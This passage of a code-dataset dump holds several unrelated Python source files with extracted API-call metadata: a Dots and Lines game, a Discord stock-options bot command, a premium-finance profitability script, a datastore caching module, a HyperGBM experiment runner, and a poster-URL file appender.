board[row][col]['winner'] = currMover
return board
def countScore(board):
scores = {'A': 0, 'B': 0}
for row in range(0, len(board)):
for col in range(0, len(board)):
if board[row][col]['winner'] == 'A':
scores['A'] += 1
if board[row][col]['winner'] == 'B':
scores['B'] += 1
return scores
board = '''
***
***
***
'''
def printDotsBoard(board):
board_string = ''
for row in range(0, len(board)):
for col in range(0, len(board[row])):
board_string += '*'
if 'T' in board[row][col]['lines']:
board_string += '---'
else:
board_string += ' '
if col == len(board[row]) - 1:
board_string += '*\n'
for space in range(0, len(board[row])):
if 'L' in board[row][space]['lines']:
board_string += '| '
else:
board_string += ' '
if '' != board[row][space]['winner']:
board_string += board[row][space]['winner']
else:
board_string += ' '
if space == len(board[row]) - 1 and 'R' in board[row][space]['lines']:
board_string += ' |'
else:
board_string += ' '
board_string += '\n'
if row == len(board) - 1:
for col in range(0, len(board[row])):
board_string += '*'
if 'B' in board[row][col]['lines']:
board_string += '---'
else:
board_string += ' '
board_string += '*'
print(board_string)
class DotLineState:
def __init__(self, to_move, board, label=None, scores={'A': 0, 'B': 0}):
self.to_move = to_move
self.board = board
self.label = label
self.scores = scores
def __str__(self):
if self.label is None:
return super(DotLineState, self).__str__()
return self.label
class DotsAndLines(Game):
"""
An implementation of Dots and Lines
"""
def __init__(self, state):
self.initial = state
self.size = len(state.board)
def actions(self, state):
"Legal moves are any square not yet taken."
moves = availableMoves(state.board)
return moves
# defines the order of play
def opponent(self, player):
if player == 'A':
return 'B'
if player == 'B':
return 'A'
return None
def result(self, state, move):
row, col, side = move
currMover = state.to_move
nextMover = self.opponent(currMover)
newState = deepcopy(state)
newState.to_move = nextMover
newState.board = applyMove(newState.board, self.size, row, col, side, currMover)
newState.scores = countScore(newState.board)
return newState
def utility(self, state, player):
"Player relative score"
opponent = self.opponent(player)
return state.scores[player] - state.scores[opponent]
def terminal_test(self, state):
"A state is terminal if it is won or there are no empty squares."
return len(self.actions(state)) == 0
def display(self, state):
# print_table(state.board, njust='center', sep=',')
printDotsBoard(state.board)
print('Score: ' + str(state.scores))
'''
Board represents the squares, whether the top, bottom, left, and
right have been filled, and which player owns the square.
'''
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]]
won = DotLineState(board=dotLineBoard, to_move='A', label='Won', scores={'A': 3, 'B': 1})
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]]
lost = DotLineState(board=dotLineBoard, to_move='A', label='Lost', scores={'A': 1, 'B': 3})
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]]
tied = DotLineState(board=dotLineBoard, to_move='A', label='Tied', scores={'A': 2, 'B': 2})
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': '', 'lines': ['T', 'L']}]]
winin1Dots = DotLineState(board=dotLineBoard, to_move='A', label='Win in 1', scores={'A': 2, 'B': 1})
dotLineBoard = [[{'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['T', 'L']}, {'winner': '', 'lines': ['R']}],
[{'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['L', 'R']}],
[{'winner': '', 'lines': ['B', 'L', 'R']}, {'winner': '', 'lines': ['L', 'B']}, {'winner': '', 'lines': ['B', 'R']}],
]
winIn5_3x3 = DotLineState(board=dotLineBoard, to_move='A', label='Win in 5', scores={'A': 0, 'B': 0})
play = DotLineState(
board=[[{'winner': '', 'lines': []}, {'winner': '', 'lines': []}],
[{'winner': '', 'lines': []}, {'winner': '', 'lines': []}]],
to_move='A', label='Start')
#amended by whh
dotLine = DotsAndLines(play)
#dotLine = DotsAndLines(winIn5_3x3)
myGames = {
dotLine: [
won,
lost,
tied,
winin1Dots,
winIn5_3x3,
play
]
}
| [((44, 13, 44, 28), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((56, 13, 56, 28), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((211, 12, 211, 27), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((47, 11, 47, 24), 'math.isnan', 'isnan', ({(47, 17, 47, 23): 'row[c]'}, {}), '(row[c])', False, 'from math import nan, isnan\n'), ((58, 11, 58, 29), 'math.isnan', 'isnan', ({(58, 17, 58, 28): 'board[r][c]'}, {}), '(board[r][c])', False, 'from math import nan, isnan\n'), ((100, 19, 100, 34), 'copy.deepcopy', 'deepcopy', ({(100, 28, 100, 33): 'state'}, {}), '(state)', False, 'from copy import deepcopy\n'), ((117, 8, 117, 57), 'grading.util.print_table', 'print_table', (), '', False, 'from grading.util import print_table\n'), ((341, 19, 341, 34), 'copy.deepcopy', 'deepcopy', ({(341, 28, 341, 33): 'state'}, {}), '(state)', False, 'from copy import deepcopy\n')] |
minhhoang1023/GamestonkTerminal | discordbot/stocks/options/opt_chain.py | 195dc19b491052df080178c0cc6a9d535a91a704 | import os
import df2img
import disnake
import numpy as np
import pandas as pd
from menus.menu import Menu
from PIL import Image
import discordbot.config_discordbot as cfg
from discordbot.config_discordbot import gst_imgur, logger
from discordbot.helpers import autocrop_image
from gamestonk_terminal.stocks.options import yfinance_model
async def chain_command(
ctx,
ticker: str = None,
expiry: str = None,
opt_type: str = None,
min_sp: float = None,
max_sp: float = None,
):
"""Show calls/puts for given ticker and expiration"""
try:
# Debug
if cfg.DEBUG:
logger.debug(
"opt-chain %s %s %s %s %s", ticker, expiry, opt_type, min_sp, max_sp
)
# Check for argument
if not ticker:
raise Exception("Stock ticker is required")
dates = yfinance_model.option_expirations(ticker)
if not dates:
raise Exception("Stock ticker is invalid")
options = yfinance_model.get_option_chain(ticker, str(expiry))
calls_df = options.calls
puts_df = options.puts
column_map = {"openInterest": "oi", "volume": "vol", "impliedVolatility": "iv"}
columns = [
"strike",
"bid",
"ask",
"volume",
"openInterest",
"impliedVolatility",
]
if opt_type == "Calls":
df = calls_df[columns].rename(columns=column_map)
if opt_type == "Puts":
df = puts_df[columns].rename(columns=column_map)
min_strike = np.percentile(df["strike"], 1)
max_strike = np.percentile(df["strike"], 100)
if min_sp:
min_strike = min_sp
if max_sp:
max_strike = max_sp
if min_sp > max_sp: # type: ignore
min_sp, max_sp = max_strike, min_strike
df = df[df["strike"] >= min_strike]
df = df[df["strike"] <= max_strike]
df["iv"] = pd.to_numeric(df["iv"].astype(float))
formats = {"iv": "{:.2f}"}
for col, f in formats.items():
df[col] = df[col].map(lambda x: f.format(x)) # pylint: disable=W0640
df.set_index("strike", inplace=True)
title = f"Stocks: {opt_type} Option Chain for {ticker.upper()} on {expiry} [yfinance]"
embeds: list = []
# Weekly Calls Pages
i, i2, end = 0, 0, 20
df_pg = []
embeds_img = []
dindex = len(df.index)
while i < dindex:
df_pg = df.iloc[i:end]
df_pg.append(df_pg)
figp = df2img.plot_dataframe(
df_pg,
fig_size=(1000, (40 + (40 * 20))),
col_width=[3, 3, 3, 3],
tbl_cells=dict(
height=35,
),
font=dict(
family="Consolas",
size=20,
),
template="plotly_dark",
paper_bgcolor="rgba(0, 0, 0, 0)",
)
imagefile = f"opt-chain{i}.png"
df2img.save_dataframe(fig=figp, filename=imagefile)
image = Image.open(imagefile)
image = autocrop_image(image, 0)
image.save(imagefile, "PNG", quality=100)
uploaded_image = gst_imgur.upload_image(imagefile, title="something")
image_link = uploaded_image.link
embeds_img.append(
f"{image_link}",
)
embeds.append(
disnake.Embed(
title=title,
colour=cfg.COLOR,
),
)
i2 += 1
i += 20
end += 20
os.remove(imagefile)
# Author/Footer
for i in range(0, i2):
embeds[i].set_author(
name=cfg.AUTHOR_NAME,
url=cfg.AUTHOR_URL,
icon_url=cfg.AUTHOR_ICON_URL,
)
embeds[i].set_footer(
text=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
i = 0
for i in range(0, i2):
embeds[i].set_image(url=embeds_img[i])
i += 1
embeds[0].set_footer(text=f"Page 1 of {len(embeds)}")
options = [
disnake.SelectOption(label="Home", value="0", emoji="🟢"),
]
await ctx.send(embed=embeds[0], view=Menu(embeds, options))
except Exception as e:
embed = disnake.Embed(
title="ERROR Stock-Options: Expirations",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed, delete_after=30.0)
| [((36, 16, 36, 57), 'gamestonk_terminal.stocks.options.yfinance_model.option_expirations', 'yfinance_model.option_expirations', ({(36, 50, 36, 56): 'ticker'}, {}), '(ticker)', False, 'from gamestonk_terminal.stocks.options import yfinance_model\n'), ((60, 21, 60, 51), 'numpy.percentile', 'np.percentile', ({(60, 35, 60, 47): "df['strike']", (60, 49, 60, 50): '1'}, {}), "(df['strike'], 1)", True, 'import numpy as np\n'), ((61, 21, 61, 53), 'numpy.percentile', 'np.percentile', ({(61, 35, 61, 47): "df['strike']", (61, 49, 61, 52): '100'}, {}), "(df['strike'], 100)", True, 'import numpy as np\n'), ((28, 12, 30, 13), 'discordbot.config_discordbot.logger.debug', 'logger.debug', ({(29, 16, 29, 42): '"""opt-chain %s %s %s %s %s"""', (29, 44, 29, 50): 'ticker', (29, 52, 29, 58): 'expiry', (29, 60, 29, 68): 'opt_type', (29, 70, 29, 76): 'min_sp', (29, 78, 29, 84): 'max_sp'}, {}), "('opt-chain %s %s %s %s %s', ticker, expiry, opt_type, min_sp,\n max_sp)", False, 'from discordbot.config_discordbot import gst_imgur, logger\n'), ((107, 12, 107, 63), 'df2img.save_dataframe', 'df2img.save_dataframe', (), '', False, 'import df2img\n'), ((108, 20, 108, 41), 'PIL.Image.open', 'Image.open', ({(108, 31, 108, 40): 'imagefile'}, {}), '(imagefile)', False, 'from PIL import Image\n'), ((109, 20, 109, 44), 'discordbot.helpers.autocrop_image', 'autocrop_image', ({(109, 35, 109, 40): 'image', (109, 42, 109, 43): '0'}, {}), '(image, 0)', False, 'from discordbot.helpers import autocrop_image\n'), ((112, 29, 112, 81), 'discordbot.config_discordbot.gst_imgur.upload_image', 'gst_imgur.upload_image', (), '', False, 'from discordbot.config_discordbot import gst_imgur, logger\n'), ((126, 12, 126, 32), 'os.remove', 'os.remove', ({(126, 22, 126, 31): 'imagefile'}, {}), '(imagefile)', False, 'import os\n'), ((147, 12, 147, 71), 'disnake.SelectOption', 'disnake.SelectOption', (), '', False, 'import disnake\n'), ((153, 16, 157, 9), 'disnake.Embed', 'disnake.Embed', (), '', False, 'import disnake\n'), ((118, 16, 121, 17), 'disnake.Embed', 'disnake.Embed', (), '', False, 'import disnake\n'), ((150, 45, 150, 66), 'menus.menu.Menu', 'Menu', ({(150, 50, 150, 56): 'embeds', (150, 58, 150, 65): 'options'}, {}), '(embeds, options)', False, 'from menus.menu import Menu\n')] |
xujiahuayz/premfin | scripts/get_lenderprofit.py | 0e90d876ef7c9ef4f3da7d4842b8ec5ae9ac7e68 | #%% import packages
import numpy as np
import pandas as pd
import multiprocessing
from time import time
import json
from premiumFinance.constants import (
MORTALITY_TABLE_CLEANED_PATH,
PROCESSED_PROFITABILITY_PATH,
)
from premiumFinance.financing import calculate_lender_profit, yield_curve
mortality_experience = pd.read_excel(MORTALITY_TABLE_CLEANED_PATH)
#%% calculate profit rate
def get_average_profitability(
is_level_premium=True,
lapse_assumption=True,
policyholder_rate=yield_curve,
statutory_interest=0.035,
premium_markup=0.0,
cash_interest=0.001,
lender_coc=0.01,
data_frame=mortality_experience,
):
profit_columns = data_frame.apply(
lambda row: calculate_lender_profit(
row=row,
is_level_premium=is_level_premium,
lapse_assumption=lapse_assumption,
policyholder_rate=policyholder_rate,
statutory_interest=statutory_interest,
premium_markup=premium_markup,
cash_interest=cash_interest,
lender_coc=lender_coc,
),
axis=1,
result_type="expand",
)
data_frame[["Breakeven Loan rate", "Lender profit"]] = profit_columns
data_frame["Dollar profit"] = (
data_frame["Lender profit"] * data_frame["Amount Exposed"]
)
average_profitability = (
data_frame["Dollar profit"].sum() / data_frame["Amount Exposed"].sum()
)
return average_profitability, data_frame
def tempfunc_t(x):
a, _ = get_average_profitability(lender_coc=x, lapse_assumption=True)
return a
def tempfunc_f(x):
a, _ = get_average_profitability(lender_coc=x, lapse_assumption=False)
return a
lender_coc_value = np.arange(start=0.01, stop=0.2, step=0.01)
#%% tbd
if __name__ == "__main__":
pool = multiprocessing.Pool()
start_time = time()
foo = []
for tempfunc in (tempfunc_t, tempfunc_f):
foo.append(
pool.map(
tempfunc,
lender_coc_value,
)
)
print(f"it took {time() - start_time}")
lender_profitability = {
"lender_coc": lender_coc_value.tolist(),
"profitability": foo,
}
with open(PROCESSED_PROFITABILITY_PATH, "w") as outfile:
json.dump(lender_profitability, outfile)
| [((15, 23, 15, 66), 'pandas.read_excel', 'pd.read_excel', ({(15, 37, 15, 65): 'MORTALITY_TABLE_CLEANED_PATH'}, {}), '(MORTALITY_TABLE_CLEANED_PATH)', True, 'import pandas as pd\n'), ((64, 19, 64, 61), 'numpy.arange', 'np.arange', (), '', True, 'import numpy as np\n'), ((69, 11, 69, 33), 'multiprocessing.Pool', 'multiprocessing.Pool', ({}, {}), '()', False, 'import multiprocessing\n'), ((71, 17, 71, 23), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((86, 8, 86, 48), 'json.dump', 'json.dump', ({(86, 18, 86, 38): 'lender_profitability', (86, 40, 86, 47): 'outfile'}, {}), '(lender_profitability, outfile)', False, 'import json\n'), ((29, 20, 38, 9), 'premiumFinance.financing.calculate_lender_profit', 'calculate_lender_profit', (), '', False, 'from premiumFinance.financing import calculate_lender_profit, yield_curve\n'), ((80, 21, 80, 27), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n')] |
BearerPipelineTest/catapult | dashboard/dashboard/common/layered_cache.py | 3800a67cd916200046a50748893bbd0dcf3d7f4a | # Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Caches processed query results in memcache and datastore.
Memcache is not very reliable for the perf dashboard. Prometheus team explained
that memcache is LRU and shared between multiple applications, so their activity
may result in our data being evicted. To prevent this, we cache processed
query results in the data store. Using NDB, the values are also cached in
memcache if possible. This improves performance because doing a get()
for a key which has a single BlobProperty is much quicker than a complex query
over a large dataset.
(Background: http://g/prometheus-discuss/othVtufGIyM/wjAS5djyG8kJ)
When an item is cached, layered_cache does the following:
1) Namespaces the key based on whether datastore_hooks says the request is
internal_only.
2) Pickles the value (memcache does this internally), and adds a data store
entity with the key and a BlobProperty with the pickled value.
Retrieving values checks memcache via NDB first, and if datastore is used it
unpickles.
When an item is removed from the the cache, it is removed from both internal and
external caches, since removals are usually caused by large changes that affect
both caches.
Although this module contains ndb.Model classes, these are not intended
to be used directly by other modules.
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import six.moves.cPickle as cPickle
import datetime
import logging
from google.appengine.api import datastore_errors
from google.appengine.runtime import apiproxy_errors
from google.appengine.ext import ndb
from dashboard.common import datastore_hooks
from dashboard.common import namespaced_stored_object
from dashboard.common import stored_object
class CachedPickledString(ndb.Model):
value = ndb.BlobProperty()
expire_time = ndb.DateTimeProperty()
@classmethod
def NamespacedKey(cls, key, namespace):
return ndb.Key(cls.__name__,
namespaced_stored_object.NamespaceKey(key, namespace))
@classmethod
def GetExpiredKeys(cls):
"""Gets keys of expired entities.
Returns:
List of keys for items which are expired.
"""
current_time = datetime.datetime.now()
query = cls.query(cls.expire_time < current_time)
query = query.filter(cls.expire_time != None)
return query.fetch(keys_only=True)
def Get(key):
"""Gets the value from the datastore."""
if key is None:
return None
namespaced_key = namespaced_stored_object.NamespaceKey(key)
entity = ndb.Key('CachedPickledString',
namespaced_key).get(read_policy=ndb.EVENTUAL_CONSISTENCY)
if entity:
return cPickle.loads(entity.value)
return stored_object.Get(key)
def GetExternal(key):
"""Gets the value from the datastore for the externally namespaced key."""
if key is None:
return None
namespaced_key = namespaced_stored_object.NamespaceKey(
key, datastore_hooks.EXTERNAL)
entity = ndb.Key('CachedPickledString',
namespaced_key).get(read_policy=ndb.EVENTUAL_CONSISTENCY)
if entity:
return cPickle.loads(entity.value)
return stored_object.Get(key)
def Set(key, value, days_to_keep=None, namespace=None):
"""Sets the value in the datastore.
Args:
key: The key name, which will be namespaced.
value: The value to set.
days_to_keep: Number of days to keep entity in datastore, default is None.
Entity will not expire when this value is 0 or None.
namespace: Optional namespace, otherwise namespace will be retrieved
using datastore_hooks.GetNamespace().
"""
# When number of days to keep is given, calculate expiration time for
# the entity and store it in datastore.
# Once the entity expires, it will be deleted from the datastore.
expire_time = None
if days_to_keep:
expire_time = datetime.datetime.now() + datetime.timedelta(
days=days_to_keep)
namespaced_key = namespaced_stored_object.NamespaceKey(key, namespace)
try:
CachedPickledString(
id=namespaced_key, value=cPickle.dumps(value),
expire_time=expire_time).put()
except datastore_errors.BadRequestError as e:
logging.warning('BadRequestError for key %s: %s', key, e)
except apiproxy_errors.RequestTooLargeError as e:
stored_object.Set(key, value)
def SetExternal(key, value, days_to_keep=None):
"""Sets the value in the datastore for the externally namespaced key.
Needed for things like /add_point that update internal/external data at the
same time.
Args:
key: The key name, which will be namespaced as externally_visible.
value: The value to set.
days_to_keep: Number of days to keep entity in datastore, default is None.
Entity will not expire when this value is 0 or None.
"""
Set(key, value, days_to_keep, datastore_hooks.EXTERNAL)
@ndb.synctasklet
def Delete(key):
"""Clears the value from the datastore."""
yield DeleteAsync(key)
@ndb.tasklet
def DeleteAsync(key):
unnamespaced_future = stored_object.DeleteAsync(key)
# See the comment in stored_object.DeleteAsync() about this get().
entities = yield ndb.get_multi_async([
CachedPickledString.NamespacedKey(key, datastore_hooks.INTERNAL),
CachedPickledString.NamespacedKey(key, datastore_hooks.EXTERNAL),
])
keys = [entity.key for entity in entities if entity]
yield (unnamespaced_future, ndb.delete_multi_async(keys))
def DeleteAllExpiredEntities():
"""Deletes all expired entities from the datastore."""
ndb.delete_multi(CachedPickledString.GetExpiredKeys())
| [((49, 10, 49, 28), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((50, 16, 50, 38), 'google.appengine.ext.ndb.DateTimeProperty', 'ndb.DateTimeProperty', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((74, 19, 74, 61), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(74, 57, 74, 60): 'key'}, {}), '(key)', False, 'from dashboard.common import namespaced_stored_object\n'), ((79, 9, 79, 31), 'dashboard.common.stored_object.Get', 'stored_object.Get', ({(79, 27, 79, 30): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((86, 19, 87, 36), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(87, 6, 87, 9): 'key', (87, 11, 87, 35): 'datastore_hooks.EXTERNAL'}, {}), '(key, datastore_hooks.EXTERNAL)', False, 'from dashboard.common import namespaced_stored_object\n'), ((92, 9, 92, 31), 'dashboard.common.stored_object.Get', 'stored_object.Get', ({(92, 27, 92, 30): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((113, 19, 113, 72), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(113, 57, 113, 60): 'key', (113, 62, 113, 71): 'namespace'}, {}), '(key, namespace)', False, 'from dashboard.common import namespaced_stored_object\n'), ((148, 24, 148, 54), 'dashboard.common.stored_object.DeleteAsync', 'stored_object.DeleteAsync', ({(148, 50, 148, 53): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((64, 19, 64, 42), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((78, 11, 78, 38), 'six.moves.cPickle.loads', 'cPickle.loads', ({(78, 25, 78, 37): 'entity.value'}, {}), '(entity.value)', True, 'import six.moves.cPickle as cPickle\n'), ((91, 11, 91, 38), 'six.moves.cPickle.loads', 'cPickle.loads', ({(91, 25, 91, 37): 'entity.value'}, {}), '(entity.value)', True, 'import six.moves.cPickle as cPickle\n'), ((55, 19, 55, 72), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(55, 57, 55, 60): 'key', (55, 62, 55, 71): 'namespace'}, {}), '(key, namespace)', False, 'from dashboard.common import namespaced_stored_object\n'), ((75, 11, 76, 34), 'google.appengine.ext.ndb.Key', 'ndb.Key', ({(75, 19, 75, 40): '"""CachedPickledString"""', (76, 19, 76, 33): 'namespaced_key'}, {}), "('CachedPickledString', namespaced_key)", False, 'from google.appengine.ext import ndb\n'), ((88, 11, 89, 34), 'google.appengine.ext.ndb.Key', 'ndb.Key', ({(88, 19, 88, 40): '"""CachedPickledString"""', (89, 19, 89, 33): 'namespaced_key'}, {}), "('CachedPickledString', namespaced_key)", False, 'from google.appengine.ext import ndb\n'), ((111, 18, 111, 41), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((111, 44, 112, 26), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((120, 4, 120, 61), 'logging.warning', 'logging.warning', ({(120, 20, 120, 52): '"""BadRequestError for key %s: %s"""', (120, 54, 120, 57): 'key', (120, 59, 120, 60): 'e'}, {}), "('BadRequestError for key %s: %s', key, e)", False, 'import logging\n'), ((122, 4, 122, 33), 'dashboard.common.stored_object.Set', 'stored_object.Set', ({(122, 22, 122, 25): 'key', (122, 27, 122, 32): 'value'}, {}), '(key, value)', False, 'from dashboard.common import stored_object\n'), ((155, 30, 155, 58), 'google.appengine.ext.ndb.delete_multi_async', 'ndb.delete_multi_async', ({(155, 53, 155, 57): 'keys'}, {}), '(keys)', False, 'from google.appengine.ext import ndb\n'), ((117, 33, 117, 53), 'six.moves.cPickle.dumps', 'cPickle.dumps', ({(117, 47, 117, 52): 'value'}, {}), '(value)', True, 'import six.moves.cPickle as cPickle\n')] |
BigAndSweet/HyperGBM | hypergbm/tests/cuml_/run_experiment_cuml.py | f3bc4e0d877b82a264d35158f9bc974f43a2a5ee | # -*- coding:utf-8 -*-
"""
"""
import cudf
from hypergbm import make_experiment
from hypernets.tabular import get_tool_box
from hypernets.tabular.datasets import dsutils
def main(target='y', dtype=None, max_trials=3, drift_detection=False, clear_cache=True, **kwargs):
tb = get_tool_box(cudf.DataFrame)
assert isinstance(tb, type) and tb.__name__ == 'CumlToolBox'
print("preparing...")
df = dsutils.load_bank()
if dtype is not None:
df[target] = df[target].astype(dtype)
df, = tb.from_local(df)
assert isinstance(df, cudf.DataFrame)
df_train, df_test = tb.train_test_split(df, test_size=0.5, random_state=123)
X_test = df_test
y_test = X_test.pop(target)
exp = make_experiment(df_train, target=target,
test_data=X_test.copy(),
max_trials=max_trials,
drift_detection=drift_detection,
clear_cache=clear_cache,
**kwargs)
print('experiment:', f'{[s.name for s in exp.steps]}', 'random_state', exp.random_state)
print("training...")
estimator = exp.run()
print('estimator pipeline:', f'{[s[0] for s in estimator.steps]}')
print("scoring...")
y_pred = estimator.predict(X_test)
y_proba = estimator.predict_proba(X_test)
task = exp.task
if task == 'regression':
metrics = ['mse', 'mae', 'msle', 'rmse', 'r2']
else:
metrics = ['auc', 'accuracy', 'f1', 'recall']
result = tb.metrics.calc_score(y_test, y_pred, y_proba, task=task, metrics=metrics,
pos_label=kwargs.get('pos_label', None))
print(result)
return exp, estimator
if __name__ == '__main__':
main(target='y', reward_metric='auc', ensemble_size=10, pos_label='yes', log_level='info', max_trials=10)
# main(target='y', max_trials=10, cv=False, ensemble_size=0, verbose=0, pos_label='yes', )
# main(target='day', reward_metric='f1', ensemble_size=10, log_level='info', max_trials=5)
# main(target='day', dtype='str', reward_metric='f1', ensemble_size=0, log_level='info', max_trials=6)
# main(target='age', dtype='float', ensemble_size=10, log_level='info', max_trials=8)
| [((14, 9, 14, 37), 'hypernets.tabular.get_tool_box', 'get_tool_box', ({(14, 22, 14, 36): 'cudf.DataFrame'}, {}), '(cudf.DataFrame)', False, 'from hypernets.tabular import get_tool_box\n'), ((18, 9, 18, 28), 'hypernets.tabular.datasets.dsutils.load_bank', 'dsutils.load_bank', ({}, {}), '()', False, 'from hypernets.tabular.datasets import dsutils\n')] |
DarthSpector/Poster-Adder | Inserter.py | 97a86338987dd8cbcdf56414f53932c0370dcfc2 | def pictureInserter(og,address,list):
j=0
for i in og:
file1 = open(address+'/'+i, "a")
x="\ncover::https://image.tmdb.org/t/p/original/"+list[j]
file1.writelines(x)
file1.close()
j=j+1
| [] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.